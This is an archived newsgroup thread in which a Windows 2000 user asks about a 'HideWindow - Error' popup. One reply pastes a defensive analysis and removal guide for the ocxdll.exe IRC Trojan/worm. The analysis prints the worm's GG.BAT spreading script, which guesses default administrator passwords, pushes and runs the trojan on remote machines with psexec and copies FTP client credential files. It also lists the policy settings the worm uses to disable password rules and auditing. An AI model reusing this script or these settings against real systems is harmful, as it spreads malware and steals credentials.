Hidewindow - Error (File Not Found!) 
Author Message
 Hidewindow - Error (File Not Found!)

I do not how I got it or what it is and apparently no one else does, either!
It started when I went to Explorer or any applications like it! A small
square little error screen that says "HideWindow - Error", the message is
"File Not Found!". When I hit "OK", my system has a heart attack for a few
minutes, it makes almost impossible to work! I use to run McAfee but switch
on to Norton and it must have got by it! I research it and got the info that
it was IRC Trojan but it can not be because I have the removal tool for that
and it does not work. I was running Norton and the only help, they gave me
was to upgrade to Norton 2003 Professional, which I did and still nothing.
You know I hate these big internet companies, they sell you software that
does not work, the only answer they have is upgrade and if you need to talk
to someone they charge you $35.00 a shot. I could not get away with doing
business, like that! Anyway, does someone out there have a idea. I am
getting desperate!
RB


Tue, 29 Mar 2005 06:56:07 GMT  
 Hidewindow - Error (File Not Found!)
Go to www.moosoft.com and download The Cleaner.  Run it and see if if finds anything on
your system.

Go to start Run type msconfig and go to the startup tab
See what is in there

: I do not how I got it or what it is and apparently no one else does, either!
: It started when I went to Explorer or any applications like it! A small
: square little error screen that says "HideWindow - Error", the message is
: "File Not Found!". When I hit "OK", my system has a heart attack for a few
: minutes, it makes almost impossible to work! I use to run McAfee but switch
: on to Norton and it must have got by it! I research it and got the info that
: it was IRC Trojan but it can not be because I have the removal tool for that
: and it does not work. I was running Norton and the only help, they gave me
: was to upgrade to Norton 2003 Professional, which I did and still nothing.
: You know I hate these big internet companies, they sell you software that
: does not work, the only answer they have is upgrade and if you need to talk
: to someone they charge you $35.00 a shot. I could not get away with doing
: business, like that! Anyway, does someone out there have a idea. I am
: getting desperate!
: RB
:
:
:



Tue, 29 Mar 2005 19:47:28 GMT  
 Hidewindow - Error (File Not Found!)
Layla is one of my all time favorite songs. It had a special meaning to me
during a very stuff time!
Anyway, I followed your instructions and I was not successful! I am running
Window 2000 Professional.
1. After running Cleaner, I got the following:
FILE: C:\PAGEFILE.SYS
PROBLEM: I could not scan this file.  Error Code 5: "Access is denied."
SOLUTION: A common reason for this error is that Windows has locked the file
for
SOLUTION: exclusive access.  A swap file is a common example.  Also, an
antivirus
SOLUTION: program might be denying access to the file.  In that case, you
can
SOLUTION: temporarily disable the anti-virus to clean the trojan.
    I disabled Norton and got the results!
2. When I tried to use "msconfig", I get the message, that it or one of it's
components can not be found or incorrect path!
Anything, else?
RB
Quote:
----- Original Message -----

Newsgroups: microsoft.public.scripting.virus.discussion
Sent: Friday, October 11, 2002 6:47 AM
Subject: Re: Hidewindow - Error (File Not Found!)

> Go to www.moosoft.com and download The Cleaner.  Run it and see if if
finds anything on
> your system.

> Go to start Run type msconfig and go to the startup tab
> See what is in there



> : I do not how I got it or what it is and apparently no one else does,
either!
> : It started when I went to Explorer or any applications like it! A small
> : square little error screen that says "HideWindow - Error", the message
is
> : "File Not Found!". When I hit "OK", my system has a heart attack for a
few
> : minutes, it makes almost impossible to work! I use to run McAfee but
switch
> : on to Norton and it must have got by it! I research it and got the info
that
> : it was IRC Trojan but it can not be because I have the removal tool for
that
> : and it does not work. I was running Norton and the only help, they gave
me
> : was to upgrade to Norton 2003 Professional, which I did and still
nothing.
> : You know I hate these big internet companies, they sell you software
that
> : does not work, the only answer they have is upgrade and if you need to
talk
> : to someone they charge you $35.00 a shot. I could not get away with
doing
> : business, like that! Anyway, does someone out there have a idea. I am
> : getting desperate!
> : RB
> :
> :
> :



> Go to www.moosoft.com and download The Cleaner.  Run it and see if if
finds anything on
> your system.

> Go to start Run type msconfig and go to the startup tab
> See what is in there



> : I do not how I got it or what it is and apparently no one else does,
either!
> : It started when I went to Explorer or any applications like it! A small
> : square little error screen that says "HideWindow - Error", the message
is
> : "File Not Found!". When I hit "OK", my system has a heart attack for a
few
> : minutes, it makes almost impossible to work! I use to run McAfee but
switch
> : on to Norton and it must have got by it! I research it and got the info
that
> : it was IRC Trojan but it can not be because I have the removal tool for
that
> : and it does not work. I was running Norton and the only help, they gave
me
> : was to upgrade to Norton 2003 Professional, which I did and still
nothing.
> : You know I hate these big internet companies, they sell you software
that
> : does not work, the only answer they have is upgrade and if you need to
talk
> : to someone they charge you $35.00 a shot. I could not get away with
doing
> : business, like that! Anyway, does someone out there have a idea. I am
> : getting desperate!
> : RB
> :
> :
> :



Tue, 29 Mar 2005 21:33:14 GMT  
 Hidewindow - Error (File Not Found!)
Layla is one of my favorites as well.....

Found this information in a discussion group in newbies.org resulting from questions on
Hidewindow-errors

Read the following and see if any of this pertains to your situation

++
This is a trojan using SMB over TCP attack, using port 445. It looked for vulnerability
in weak administrator id and passwords on the local Windows 2000 systems.
++

One of my clients also got infected with ocxdll.exe virus. This occurred back in
8/28/2002 at 3am. After some detailed analysis, I have determined that it was a Trojan,
deleted the detected registry entries, delete the infected files, tighten the
administrator ID and password, restored the security policy by running "secedit.exe
/configure" (from Microsoft) to restore the security policy (If they have a backup .sdb
file, then just reapply the security policy would fix this part), add users back to
local. The cause is bad security (admin ID and passwords), and a backdoor to drop the
ocxdll.exe.

Effected systems:
++
- Windows 2000. Security policies alteration was ONLY for Windows 2000
- Windows NT - might be infected, but will not distribute or change security policies.

What did it do?
++
1. hide all programs it ran.
2. open backdoor, port 60609
3. Run mIRC client with random usernames listed in mdm.scr with more random characters
4. It ran the bot (robot) scripts in the following order, which means they contained
malicious automated instructions.

[rfiles]
n0=nt32.ini
n1=dll16.ini
n2=nt32.ini
n3=dll32nt.hlp
n4=xvpll.hlp
n5=dll32.hlp
n6=httpsearch.ini.

5. Replace security policy settings using Microsoft security editor (SecEdit.exe
/configure) command and reset the security policy to default settings, and replace
security settings in the TFT8675. This is done in quiet mode.
6. It scans for 20 IP's and then start running "GG.BAT", which is the real program that
started the hacking.
7. It tries to hack into the system using the following user ID and password. If you
don't have these user id and passwords, maybe you are just infected with 1 system, and
it could not spread via this Trojan/worm.
a. "administrator" with NO password
b. "administrator" with "administrator" password
c. "root" with "root" password
d. "admin" with "admin" password
8. If you have some guessable administrator id and passwords, then probably these
systems were hacked successfully. It copied the Trojan OCXDLL.EXE to the compromised
systems. If file were there, copy it anyway, and do it quietly. (using
psexec.exe -c -f -d)
9. Run the OCXDLL.EXE without any delay (psexec.exe -d), which extracted the 17 files
that are in this self-extracted file.
10. It tries to copy "c:\progra~1\flashfxp\sites.dat" and
"c:\progra~1\ws_ftp\ws_ftp.ini" to "c:\windows\system32" directory. (maybe get the
configuration from the bot?)
11. Start the "taskmngr.exe" which was really a Mirc.EXE, an irc client.
12. The scripts were kicked in to HIDE the mirc window, so you can ONLY see it in the
process. You will see "taskmngr.exe" (NOT taskmgr.exe, which is the REAL task manager)
13. xvpll.hlp reports Trojan status back to the hacker. Either attempt failed or
attempt successful.
++
Disclaimer: The irc bot scripts have not fully analyzed. This is what I understood so
far. The removal instructions WILL remove the trojan.
++

Impact:
++
This may be a random attack. However, there is a file, ncp.exe involved, which is the
NetCat program. This program allows the hackers to gain full control to your system.
Therefore,
1. Best-case scenario is that it was a hack, and no sensitive data were lost.
2. Worst-case scenario is that they have controlled your system and implemented
something new that are not yet detected.
3. The hacker has captured your IP address and knows that you were vulnerable because
the Trojan actually reported back to him/her.
++

How to remove the Trojan:
++
1. Delete files that were extracted from ocxdll.exe, plus ocxdll.exe and dll16.ini
(created when running mirc.exe)

Ocxdll.exe
Dll16.ini
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat (bat file to hack and copy Trojans)
httpsearch.ini (might show up as httpsear.ini due to 8.3 file format)
kill.exe (to kill process)
mdm.exe (to hide window program)
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp

**
**NOTE:
seced.bat is a decoy. This file was never used. The real instruction for updating the
configuration was mentioned in item #5.
v.exe is actually srvany.exe, which is another decoy. It was never used.

**

2. Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run, remove
"taskmngr.exe" (this starts mirc client program during the windows startup)
3. Change the LOCAL Administrator password on ALL Systems! Make sure they are strong
passwords! Use mix of Uppercase, Lowercase, numbers, and non-alphanumeric, i.e.
_,+,=,), ...
4. If possible, change Administrator login ID to a different user_id. This will stop
the initial user_id guessing. (This will not stop the more sophisticated hackers)
5. Restore the default security policy settings by typing "secedit /configure
C:\WINNT\security\Database\ secedit.sdb"
6. Goto start -> programs -> administrative tools -> Local Security Policy, click on
"User Rights Assignments", and add users and groups back into the policy. "Access this
computer from the network". The default setting is:
a. IWAM_[SYSTEM_NAME]
b. ADMINISTRATORS
c. BACKUP OPERATORS
d. POWER USERS
e. USERS
f. EVERYONE
g. IUSR_[ SYSTEM_NAME]

Additional Recommendation:
--
1. Tighten your Firewall and ANY all unwanted traffic from accessing ports, BOTH inside
to outside, and outside to inside.
2. Rename your administrator user id to something else, and create a user id called
"Administrator" with NO GROUPS. This will allow you to monitor anyone trying to use the
"Administrator" login.
3. Setup security log, at minimum, log successful and failed Logon/Logoff., and monitor
the event logs.
++

More details:
Infection:
registry entries
- Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run, remove
"taskmngr.exe" (this starts mirc client program during the windows startup)

When MIRC client started running, it runs the scripts in dll32nt.hlp, which in fact ran
"secedit /configure /DB secedit.sdb /cfg $mircdir $+ tftp8675 /quiet". This meant
"configure your system setting with the default security policy, plus the additional
settings in tftp8675". It basically removed many security restrictions, remove all
audits for the systems, and of course remove all users in the "Local Users allowed from
the net".
List from TFTP8675:
--
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
[Event Audit]
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
--

OCXDLL.EXE is a self-extracted file that included 17 files. It is a Trojan and it's a
worm. In the dll32nt.hlp, it has an instruction to do IP scan, and store the 20 IP
address it found. Mostly likely it scanned the subnet and file server that were
connected to the victim systems at that time. Then it has an instruction at the end to
run GG.BAT, which is the instruction to attack the 20 IP's that just found.

Here are the files that were extracted from ocxdll.exe:
++
ocxdll.exe
dll32.hlp
dll32NT.hlp
gates.txt
gg.bat
httpsearch.ini
kill.exe
mdm.exe
mdm.scr
mt.exe
ncp.exe
NT32.ini
psexec.exe
seced.bat
taskmngr.exe
tftp8675
v.exe
xvpll.hlp
++

Here is the GG.BAT text:

net use /del \\%1\ipc$
net use \\%1\ipc$ "" /user:administrator
net use \\%1\ipc$ "administrator" /user:administrator
net use \\%1\ipc$ "root" /user:root
net use \\%1\ipc$ "admin" /user:admin
psexec \\%1 attrib.exe -r ocxdll.exe
psexec \\%1 -d kill.exe temp.exe
psexec \\%1 -f -c -d ocxdll.exe -o
psexec \\%1 -d ocxdll.exe -o
psexec \\%1 cmd.exe /c copy c:\progra~1\flashfxp\sites.dat c:\winnt\system32\w%1.dat
psexec \\%1 -d taskmngr.exe
psexec \\%1 cmd.exe /c copy c:\progra~1\ws_ftp\ws_ftp.ini c:\winnt\system32\w%1.ini
psexec \\%1 -d taskmngr.exe
--

--
from SysInternals, here is the description of what the PSEXEC parameters do:
-c = Copy the specified program to the remote system for execution. If you omit this
option then the application must be in the system's path on the remote system.
-f = Copy the specified program to the remote system even if the file already exists on
the remote system.
-d = Don't wait for application to terminate. Only use this option for non-interactive
applications.
--

: Layla is one of my all time favorite songs. It had a special meaning to me
: during a very stuff time!
: Anyway, I followed your instructions and I was not successful! I am running
: Window 2000 Professional.
: 1. After running Cleaner, I got the following:
: FILE: C:\PAGEFILE.SYS
: PROBLEM: I could not scan this file.  Error Code 5: "Access is denied."
: SOLUTION: A common reason for this error is that Windows has locked the file
: for
: SOLUTION: exclusive access.  A swap file is a common example.  Also, an
: antivirus
: SOLUTION: program might be denying access to the file.  In that case, you
: can
: SOLUTION: temporarily disable the anti-virus to clean the trojan.
:     I disabled Norton and got the results!
: 2. When I tried to use "msconfig", I get the message, that it or one of it's
: components can not be found or incorrect path!
: Anything, else?
: RB
:
:

Quote:
: ----- Original Message -----

: Newsgroups: microsoft.public.scripting.virus.discussion
: Sent: Friday, October 11, 2002 6:47 AM
: Subject: Re: Hidewindow - Error (File Not Found!)
:
:
: > Go to www.moosoft.com and download The Cleaner.  Run it and see if if
: finds anything on
: > your system.
: >

...

read more »



Wed, 30 Mar 2005 03:15:18 GMT  
 
 [ 4 post ] 

 Relevant Pages 

1. ITS NOT A VIRUS, ITS A 404 ERROR, FILE NOT FOUND

2. ITS NOT A VIRUS, ITS A 404 ERROR, FILE NOT FOUND

3. Curious 'File Not Found' Error

4. File Not Found Error(3) problem

5. file not found error

6. File not found error

7. Network dos Error 55 .and. File not found

8. Error file not found

9. Topspeed - CW2003 File Convert gets File Not Found

10. Intermittant Error 37 File Not Open Error on Network

11. error 37 File not open using a variable file name

12. HRESULT Error: Parameter not found. (FACILITY_DISPATCH)

 

 
Powered by phpBB® Forum Software